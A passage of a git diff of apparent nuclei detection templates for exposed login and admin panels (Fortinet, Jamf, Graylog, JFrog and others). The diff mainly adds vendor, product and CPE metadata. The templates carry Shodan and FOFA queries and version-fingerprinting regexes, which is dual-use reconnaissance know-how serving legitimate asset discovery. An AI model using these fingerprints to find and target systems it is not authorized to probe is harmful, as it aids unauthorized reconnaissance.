tech,panel,footprints http: @@ -32,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c51c79df2b5b9126170e86534182f11edd99af1731188d7743932bb5171941e1022100f10d756600467be97727fa5aeef9b5dac73d1d0fd6930ac38dfca830810ff3a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c51c79df2b5b9126170e86534182f11edd99af1731188d7743932bb5171941e1022100f10d756600467be97727fa5aeef9b5dac73d1d0fd6930ac38dfca830810ff3a6:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/fortinet/forticlientems-panel.yaml b/http/exposed-panels/fortinet/forticlientems-panel.yaml index 372ec16789..fee71e4931 100644 --- a/http/exposed-panels/fortinet/forticlientems-panel.yaml +++ b/http/exposed-panels/fortinet/forticlientems-panel.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-800551065 + product: forticlient_endpoint_management_server + vendor: fortinet tags: panel,fortinet,forticlient,ems,login,detect + classification: + cpe: cpe:2.3:a:fortinet:forticlient_endpoint_management_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: group: 1 regex: - 'VERSION_FULL\\u0022: \\u0022(.*?)\\u0022' -# digest: 4a0a00473045022014feeb5bf2d6427144c2b239b8cf429fd6e1df8a7e1c457647e31ed12ce9e4f2022100b4ca4c2b3c91cec242d70799bde6d665e4dbefdae552b47ef14db9bade9fe0a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022014feeb5bf2d6427144c2b239b8cf429fd6e1df8a7e1c457647e31ed12ce9e4f2022100b4ca4c2b3c91cec242d70799bde6d665e4dbefdae552b47ef14db9bade9fe0a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/fortinet/fortinet-panel.yaml b/http/exposed-panels/fortinet/fortinet-panel.yaml index d15ecd0dc2..25f01ab5d1 100644 --- a/http/exposed-panels/fortinet/fortinet-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:fortinet:fortiportal:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.title:"FORTINET LOGIN" + product: fortiportal + vendor: fortinet tags: panel,fortinet,login,detect http: @@ -34,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220273d60a6d66a4c0cc51b4ce31a343113937b4022935e5bc8cb9e6fe69b51a19b02210080544f72433341760b78b49084bb44bef53d8ab3db909f0b0e5f50de1a0c47ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220273d60a6d66a4c0cc51b4ce31a343113937b4022935e5bc8cb9e6fe69b51a19b02210080544f72433341760b78b49084bb44bef53d8ab3db909f0b0e5f50de1a0c47ed:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/fortinet/fortisiem-panel.yaml b/http/exposed-panels/fortinet/fortisiem-panel.yaml index 4019b8d313..f841e44075 100644 --- a/http/exposed-panels/fortinet/fortisiem-panel.yaml +++ b/http/exposed-panels/fortinet/fortisiem-panel.yaml @@ -9,7 +9,11 @@ info: verified: true max-request: 2 shodan-query: "http.favicon.hash:-1341442175" + product: fortisiem + vendor: fortinet tags: panel,fortisiem + classification: + cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* flow: http(1) && http(2) http: - method: GET @@ -32,4 +36,4 @@ http: - type: word words: - "fortiSIEM_current_login_salt" -# digest: 4a0a00473045022100e9dab3a43744ab3fd9bd071dc4e2410892fbe12a8cddfcb31b0b25aef766897402204aa9a18b219f9467efb3939d4497c526040671daa19f24be34ea05dc555e376f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9dab3a43744ab3fd9bd071dc4e2410892fbe12a8cddfcb31b0b25aef766897402204aa9a18b219f9467efb3939d4497c526040671daa19f24be34ea05dc555e376f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/fossbilling-panel.yaml b/http/exposed-panels/fossbilling-panel.yaml index b0d413ad72..ba9eb605ba 100644 --- a/http/exposed-panels/fossbilling-panel.yaml +++ b/http/exposed-panels/fossbilling-panel.yaml @@ -5,13 +5,17 @@ info: author: ritikchaddha severity: info description: | - FOSSBilling panel has been detected. + FOSSBilling panel has been detected. metadata: verified: true max-request: 1 shodan-query: title:"FOSSBilling" + product: fossbilling + vendor: fossbilling tags: fossbilling,panel,detect + classification: + cpe: cpe:2.3:a:fossbilling:fossbilling:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022067804bff6885adbd1fce499c217be8cce2167def6d55018ceb4f9a7382cf19bf022100e419a9d2e2c13a13bea0b34b4dfef7fbafe2e59df6adeb7f1e3d8850ac55e64d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022067804bff6885adbd1fce499c217be8cce2167def6d55018ceb4f9a7382cf19bf022100e419a9d2e2c13a13bea0b34b4dfef7fbafe2e59df6adeb7f1e3d8850ac55e64d:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/freshrss-panel.yaml b/http/exposed-panels/freshrss-panel.yaml index 5b0170193c..cc8da5b7b5 100644 --- a/http/exposed-panels/freshrss-panel.yaml +++ b/http/exposed-panels/freshrss-panel.yaml @@ -10,8 +10,12 @@ info: max-request: 1 verified: true shodan-query: title:"Freshrss" + product: freshrss + vendor: freshrss tags: freshrss,panel,detect + classification: + cpe: cpe:2.3:a:freshrss:freshrss:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aeda4845bf71709e4bfbadd57d6239891557690e0840fdaf61d041d3c4e0945b022000d0b559c5a4b8b24687f1fa3a3730d6d5e33424af7f2beae04829fee3a354d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aeda4845bf71709e4bfbadd57d6239891557690e0840fdaf61d041d3c4e0945b022000d0b559c5a4b8b24687f1fa3a3730d6d5e33424af7f2beae04829fee3a354d1:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/gargoyle-router.yaml b/http/exposed-panels/gargoyle-router.yaml index bd43e6ca5e..f82f7190c5 100644 --- a/http/exposed-panels/gargoyle-router.yaml +++ b/http/exposed-panels/gargoyle-router.yaml @@ -10,10 +10,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:gargoyle-router:gargoyle:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Gargoyle Router Management Utility" + product: gargoyle + vendor: gargoyle-router tags: panel,iot,gargoyle,router,edb http: @@ -35,4 +38,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202c149cb7ac951a5d6ff6c939cbd2c12d8f6bbefcac63d2a562fbf7369d5d5e2802207796c6f816af7c892f9ba88fb09d2a2d245005c5de75f008d816de0387817eed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202c149cb7ac951a5d6ff6c939cbd2c12d8f6bbefcac63d2a562fbf7369d5d5e2802207796c6f816af7c892f9ba88fb09d2a2d245005c5de75f008d816de0387817eed:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/gespage-panel.yaml b/http/exposed-panels/gespage-panel.yaml index 02d64ec98d..27e68c2344 100644 --- a/http/exposed-panels/gespage-panel.yaml +++ b/http/exposed-panels/gespage-panel.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: Path=/gespage + product: gespage + vendor: gespage tags: panel,gespage http: @@ -37,4 +40,4 @@ http: group: 1 regex: - '\(Ver: ([0-9._A-Z]+)\)' -# digest: 4b0a00483046022100d20b00086db21ff195dee775541b0facbe564d263d6d25d7b8f2ef1c29a91ea1022100f7609b6300e08f9f42133fcd54a65543d0dad7facf2ecfa2297d4b7b2afda48e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d20b00086db21ff195dee775541b0facbe564d263d6d25d7b8f2ef1c29a91ea1022100f7609b6300e08f9f42133fcd54a65543d0dad7facf2ecfa2297d4b7b2afda48e:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/ghost-panel.yaml b/http/exposed-panels/ghost-panel.yaml index 16405a4dfa..cdafd824d1 100644 --- a/http/exposed-panels/ghost-panel.yaml +++ b/http/exposed-panels/ghost-panel.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: app="Ghost" + product: ghost + vendor: ghost tags: panel,ghost,login,detect + classification: + cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - 'content="Ghost"' condition: or case-insensitive: true -# digest: 490a0046304402202af11dfd43edc17a45dfc121349d833dbd78ff0697151d343819bb4d92d017ad02203d27811c2b3637bcec56100b871612a3681146bc78ceed7655293382f683ef14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202af11dfd43edc17a45dfc121349d833dbd78ff0697151d343819bb4d92d017ad02203d27811c2b3637bcec56100b871612a3681146bc78ceed7655293382f683ef14:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/gira-homeserver-homepage.yaml b/http/exposed-panels/gira-homeserver-homepage.yaml index 8fb5e35fd7..ada8addd57 100644 --- a/http/exposed-panels/gira-homeserver-homepage.yaml +++ b/http/exposed-panels/gira-homeserver-homepage.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:o:gira:gira_home_server_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Gira HomeServer 4" + product: gira_home_server_firmware + vendor: gira tags: panel,gira http: @@ -36,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100980bac678dbe149c6d6d987c06f656dc72b0325e1c2ab726365baad69a21e2a9022100bbf46343c567f93369b5187c50975727e91789b52a302cb85dc5a8fa3e07efc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100980bac678dbe149c6d6d987c06f656dc72b0325e1c2ab726365baad69a21e2a9022100bbf46343c567f93369b5187c50975727e91789b52a302cb85dc5a8fa3e07efc7:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/goanywhere-mft-login.yaml b/http/exposed-panels/goanywhere-mft-login.yaml index 529d6fb9f0..0ff1a54552 100644 --- a/http/exposed-panels/goanywhere-mft-login.yaml +++ b/http/exposed-panels/goanywhere-mft-login.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.html:"GoAnywhere Managed File Transfer" + product: goanywhere_managed_file_transfer + vendor: fortra tags: panel,goanywhere,login,filetransfer http: @@ -34,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c15442a80f399339280133f4868a42817bbf43119992ef0f30fc20103c56eea7022076667546c512670063e0eb4dfd989113086f99aa303b2cc7122727206c9c61c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c15442a80f399339280133f4868a42817bbf43119992ef0f30fc20103c56eea7022076667546c512670063e0eb4dfd989113086f99aa303b2cc7122727206c9c61c0:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/gocron-panel.yaml b/http/exposed-panels/gocron-panel.yaml index 4a763d52a7..b3b98d1131 100644 --- a/http/exposed-panels/gocron-panel.yaml +++ b/http/exposed-panels/gocron-panel.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:gocron_project:gocron:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="gocron-定时任务系统" + product: gocron + vendor: gocron_project tags: gocron,panel http: @@ -31,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204bfe6f1cdee6e4c5e9066ea97ca30c75dbedfa40f76d1b1107c604853b51bfd302210088851b28c86125757808d1a84dacc1ff52ca6788d833ab493f462cb2a6895784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204bfe6f1cdee6e4c5e9066ea97ca30c75dbedfa40f76d1b1107c604853b51bfd302210088851b28c86125757808d1a84dacc1ff52ca6788d833ab493f462cb2a6895784:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/gophish-login.yaml b/http/exposed-panels/gophish-login.yaml index a69e7b243e..edd39cba77 100644 --- a/http/exposed-panels/gophish-login.yaml +++ b/http/exposed-panels/gophish-login.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:getgophish:gophish:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Gophish - Login" + product: gophish + vendor: getgophish tags: panel,gophish http: @@ -27,4 +30,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204233222f93e7392a2d6d8fc0acd794d5e38bb5eb09d8c4fb107ed164e8e0a46202203794415ac7f5e5f34cdfa087f29bb1a2edc5d0a7a9c148596543a865db655a5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204233222f93e7392a2d6d8fc0acd794d5e38bb5eb09d8c4fb107ed164e8e0a46202203794415ac7f5e5f34cdfa087f29bb1a2edc5d0a7a9c148596543a865db655a5a:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/gradle/gradle-develocity-panel.yaml b/http/exposed-panels/gradle/gradle-develocity-panel.yaml index d2af369e46..6a447b6747 100644 --- a/http/exposed-panels/gradle/gradle-develocity-panel.yaml +++ b/http/exposed-panels/gradle/gradle-develocity-panel.yaml @@ -11,8 +11,12 @@ info: max-request: 1 verified: true shodan-query: http.html:"Develocity Build Cache Node" + product: build_cache_node + vendor: gradle tags: panel,gradle,detect,login + classification: + cpe: cpe:2.3:a:gradle:build_cache_node:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: group: 1 regex: - '(?i)"applicationVersion":"([0-9.]+)"' -# digest: 4b0a00483046022100df41202ea5dab8f7094a0a1b0232959bfb9ea18012d5ebc6b0d824f0f9fac149022100d4d086693942f5547de5f825737aab21335b492088e6344d696c4e5c5ced1962:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df41202ea5dab8f7094a0a1b0232959bfb9ea18012d5ebc6b0d824f0f9fac149022100d4d086693942f5547de5f825737aab21335b492088e6344d696c4e5c5ced1962:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/graphite-browser.yaml b/http/exposed-panels/graphite-browser.yaml index b38fa2ad41..f59cc86ad8 100644 --- a/http/exposed-panels/graphite-browser.yaml +++ b/http/exposed-panels/graphite-browser.yaml @@ -10,9 +10,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Graphite Browser" + product: graphite + vendor: graphite_project tags: graphite,panel http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203005924f6719e149b05eb1b64567ce327884d3e9bb92670611ed05b60ba6249c022100b2e2cce1afb5dec4c0d5e15b12a8e4dea1999f03e9aeaca4d59d5d57d769e6b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203005924f6719e149b05eb1b64567ce327884d3e9bb92670611ed05b60ba6249c022100b2e2cce1afb5dec4c0d5e15b12a8e4dea1999f03e9aeaca4d59d5d57d769e6b3:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/graylog-panel.yaml b/http/exposed-panels/graylog-panel.yaml index 92e945dca6..af334283e8 100644 --- a/http/exposed-panels/graylog-panel.yaml +++ b/http/exposed-panels/graylog-panel.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"Graylog Web Interface" + product: graylog + vendor: graylog tags: panel,graylog,login,detect + classification: + cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - 'status_code == 200' - 'contains(body, "<title>Graylog Web Interface")' condition: and -# digest: 4a0a004730450221008f995ce3c7b298c705668fcac73cd8f3957aa6dd1ac1b0200169f67e781137d40220035b58544c2f27fdd5ed1f00737a58e28617c983fd66692a878f750a77212494:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008f995ce3c7b298c705668fcac73cd8f3957aa6dd1ac1b0200169f67e781137d40220035b58544c2f27fdd5ed1f00737a58e28617c983fd66692a878f750a77212494:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/hivemanager-login-panel.yaml b/http/exposed-panels/hivemanager-login-panel.yaml index c852d062b2..a33c620e94 100644 --- a/http/exposed-panels/hivemanager-login-panel.yaml +++ b/http/exposed-panels/hivemanager-login-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:aerohive:hivemanager_classic:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:1604363273 + product: hivemanager_classic + vendor: aerohive tags: panel,hivemanager,aerohive http: @@ -32,4 +35,4 @@ http: - "HiveManager" - 'alt="Aerohive' condition: and -# digest: 4a0a00473045022031d021a9edbe1b197ce650352f3d0a64780e4d91a4a6865fa42a3db0f5d21ae00221008e424d7212ff7fc964bfa737d7237732912dc55270c9b9c71a74434a904d4373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022031d021a9edbe1b197ce650352f3d0a64780e4d91a4a6865fa42a3db0f5d21ae00221008e424d7212ff7fc964bfa737d7237732912dc55270c9b9c71a74434a904d4373:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/home-assistant-panel.yaml b/http/exposed-panels/home-assistant-panel.yaml index 28d426c4bd..5a6892b353 100644 --- a/http/exposed-panels/home-assistant-panel.yaml +++ b/http/exposed-panels/home-assistant-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"Home Assistant" + product: home-assistant + vendor: home-assistant tags: panel,iot,homeassistant http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022074ceecb1a0858b2a6acfb2844921eabd1e4835a56e7864cb27633b0b1388a7ac022027dc80b6d25fb36075117cf0615d433a9437eb6d459e9ff32143bfeef15faed5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074ceecb1a0858b2a6acfb2844921eabd1e4835a56e7864cb27633b0b1388a7ac022027dc80b6d25fb36075117cf0615d433a9437eb6d459e9ff32143bfeef15faed5:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/huawei-hg532e-panel.yaml b/http/exposed-panels/huawei-hg532e-panel.yaml index 52b036f789..b92fd2b629 100644 --- a/http/exposed-panels/huawei-hg532e-panel.yaml +++ b/http/exposed-panels/huawei-hg532e-panel.yaml @@ -11,9 +11,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:huawei:hg532e:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"HG532e" + product: hg532e + vendor: huawei tags: huawei,panel http: @@ -31,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c9c6339cb212b51e39d3ab26a205654677e7dc8b9c25035709af408af866656022100d9f2f1363242dad3be89d8939346482d6648083aff88dec0a919de06a5af682a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202c9c6339cb212b51e39d3ab26a205654677e7dc8b9c25035709af408af866656022100d9f2f1363242dad3be89d8939346482d6648083aff88dec0a919de06a5af682a:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/ibm/ibm-odm-panel.yaml b/http/exposed-panels/ibm/ibm-odm-panel.yaml index 820996d030..d7393ef61d 100644 --- a/http/exposed-panels/ibm/ibm-odm-panel.yaml +++ b/http/exposed-panels/ibm/ibm-odm-panel.yaml @@ -14,8 +14,12 @@ info: max-request: 1 fofa-query: title="Decision Center | Business Console" shodan-query: http.title:"Decision Center | Business Console" + product: operational_decision_manager + vendor: ibm tags: panel,ibm,login,detect,decision-center + classification: + cpe: cpe:2.3:a:ibm:operational_decision_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +45,4 @@ http: group: 1 regex: - '(?i)"js/dist/([0-9.]+)/decisioncenter"' -# digest: 4b0a00483046022100a3bb9b73dd48cfb52e57e67ee4156d19e151b1439e4b96bb629b532dfc182814022100e1a582afd40b108522924ce3382f701b04da9374b1e0a5945abcbe7d933a576e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a3bb9b73dd48cfb52e57e67ee4156d19e151b1439e4b96bb629b532dfc182814022100e1a582afd40b108522924ce3382f701b04da9374b1e0a5945abcbe7d933a576e:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/intelbras-login.yaml b/http/exposed-panels/intelbras-login.yaml index 7244448bf5..4159a2f8d0 100644 --- a/http/exposed-panels/intelbras-login.yaml +++ b/http/exposed-panels/intelbras-login.yaml @@ -10,10 +10,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:intelbras:iwr_3000n:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Intelbras" google-query: intitle:"Intelbras" "All Rights Reserved" -.com + product: iwr_3000n + vendor: intelbras tags: panel,edb http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205c19691fa19ff2d632d10f702356347af1c93a1986d2747e8380313f879367e802202a7222570d79d9d8a28aad219929395fd11c8bdad7d74e15aa4eecfe3d47d80b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c19691fa19ff2d632d10f702356347af1c93a1986d2747e8380313f879367e802202a7222570d79d9d8a28aad219929395fd11c8bdad7d74e15aa4eecfe3d47d80b:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/isams-panel.yaml b/http/exposed-panels/isams-panel.yaml index 54366beb32..95bcd5f6c0 100644 --- a/http/exposed-panels/isams-panel.yaml +++ b/http/exposed-panels/isams-panel.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-81573405 + product: isams + vendor: iris tags: panel,isams,login + classification: + cpe: cpe:2.3:a:iris:isams:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +45,4 @@ http: group: 1 regex: - 'Version ([0-9\.]+)' -# digest: 4b0a00483046022100e171cb45841ba1e9060e04b4c12334c376ebb29cd7d9e6571583539549963c54022100cc61c700f49d109869795aadb4a0c668a48a2a8c9a48b192a2310e61ab4acd9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e171cb45841ba1e9060e04b4c12334c376ebb29cd7d9e6571583539549963c54022100cc61c700f49d109869795aadb4a0c668a48a2a8c9a48b192a2310e61ab4acd9f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/issabel-login.yaml b/http/exposed-panels/issabel-login.yaml index 315468d6f5..739b33b69f 100644 --- a/http/exposed-panels/issabel-login.yaml +++ b/http/exposed-panels/issabel-login.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:issabel:pbx:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: title="Issabel" + product: pbx + vendor: issabel tags: issabel,panel http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204d5d1f9fe877c2b3ce366f64df93e7235b5699518332ca0ba05ce647ef22cef702205866629e45ee7dadc468314346a76b328f507821a15b84c8d1b0adaa7626296b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204d5d1f9fe877c2b3ce366f64df93e7235b5699518332ca0ba05ce647ef22cef702205866629e45ee7dadc468314346a76b328f507821a15b84c8d1b0adaa7626296b:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/jamf-login.yaml b/http/exposed-panels/jamf-login.yaml index 3e690c7049..dad5ea63bb 100644 --- a/http/exposed-panels/jamf-login.yaml +++ b/http/exposed-panels/jamf-login.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:jamf:jamf:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Jamf Pro" + product: jamf + vendor: jamf tags: panel,jamf http: @@ -31,4 +34,4 @@ http: - type: status status: - 401 -# digest: 4a0a00473045022100ef7721631ba5132a13447381bcc0cb04214e4060d42508989bbd30c00e7c2c5b022064fdacfe1035dc69e3e883c95fca9f355c54ff80aca42f009bf1f669d7e06c77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef7721631ba5132a13447381bcc0cb04214e4060d42508989bbd30c00e7c2c5b022064fdacfe1035dc69e3e883c95fca9f355c54ff80aca42f009bf1f669d7e06c77:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/jamf-panel.yaml b/http/exposed-panels/jamf-panel.yaml index 8d8fb0c3cc..d8c24388a0 100644 --- a/http/exposed-panels/jamf-panel.yaml +++ b/http/exposed-panels/jamf-panel.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:jamf:jamf:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:1262005940 + product: jamf + vendor: jamf tags: jamf,panel,mdm http: @@ -36,4 +39,4 @@ http: group: 1 regex: - '<meta name=\"version\" content=\"(.*)\">' -# digest: 490a004630440220592663452bc6935665155e7de67373b10e01147b4c4723ec59c407766d78969d022022db3450d7abaccf55f8e6ca5dd63c7e3ce5de1da0cec2481aa248b7e8ec8299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220592663452bc6935665155e7de67373b10e01147b4c4723ec59c407766d78969d022022db3450d7abaccf55f8e6ca5dd63c7e3ce5de1da0cec2481aa248b7e8ec8299:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/jamf-setup-assistant.yaml b/http/exposed-panels/jamf-setup-assistant.yaml index a2734fec62..603717ddb6 100644 --- a/http/exposed-panels/jamf-setup-assistant.yaml +++ b/http/exposed-panels/jamf-setup-assistant.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:jamf:jamf:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"Jamf Pro Setup" + product: jamf + vendor: jamf tags: jamf,setup,panel http: @@ -28,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c9af528a785aa89c878f64e105fe0c47931978bcfc83253f0d49cbe9495eef80022100e8b04ca917d294a2bfd8684ea2c2a4cf6f6fff8e632f08ab1b41f74b75b38728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9af528a785aa89c878f64e105fe0c47931978bcfc83253f0d49cbe9495eef80022100e8b04ca917d294a2bfd8684ea2c2a4cf6f6fff8e632f08ab1b41f74b75b38728:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/jfrog-login.yaml b/http/exposed-panels/jfrog-login.yaml index 64d621a53b..e9565ce9fe 100644 --- a/http/exposed-panels/jfrog-login.yaml +++ b/http/exposed-panels/jfrog-login.yaml @@ -11,10 +11,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: 